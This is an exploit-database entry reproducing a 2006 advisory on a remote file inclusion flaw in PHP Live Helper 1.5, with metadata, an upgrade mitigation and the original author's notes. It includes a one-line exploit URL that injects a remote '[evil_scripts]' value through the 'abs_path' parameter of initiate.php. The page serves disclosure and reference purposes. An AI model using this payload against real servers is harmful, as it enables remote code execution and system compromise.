PHP Live Helper - exploit.company

vendor:

PHP Live Helper

by:

SnIpEr_SA

N/A

CVSS

N/A

Remote File Include Vulnerabilities

CWE

Product Name: PHP Live Helper

Affected Version From: 1.5

Affected Version To: Last Version

Patch Exists: YES

Related CWE: N/A

CPE: a:livehelper:php_live_helper

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

PHP Live Helper <=([abs_path]) Remote File Include Vulnerabilities

A vulnerability exists in PHP Live Helper version 1.5 and last version, which allows a remote attacker to include a file from a remote host. An attacker can send a specially crafted request to the vulnerable application and execute arbitrary code on the server. This can be exploited to compromise the application and the underlying system; other attacks are also possible.

Mitigation:

Upgrade to the latest version of PHP Live Helper.

Source

Exploit-DB raw data:

---------------------------------------------------------------------------
PHP Live Helper <=([abs_path]) Remote File Include Vulnerabilities
---------------------------------------------------------------------------

Discovered By SnIpEr_SA
Author : SnIpEr_SA
Remote : Yes
Local : No
Critical Level : Dangerous

---------------------------------------------------------------------------
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : PHP Live Helper
version : 1.5 and last version
URL :http://www.live-helper.com/

------------------------------------------------------------------
Exploit:
~~~~~~~~

# http://www.site.com/[livehelperpath]/initiate.php?abs_path=[evil_scripts]

---------------------------------------------------------------------------

*/

Contact:
~~~~~~~~

SnIpEr_SA
E-mail: selfar2002@hotmail.com
E-mail: SnIpEr.SA[at]hotMail[dot]com
Homepage: http://www.3asfh.net/ & http://www.lezr.com/
Greetz: All My Frind
/*

-------------------------------- [ END ] ----------------------------------

# milw0rm.com [2006-06-18]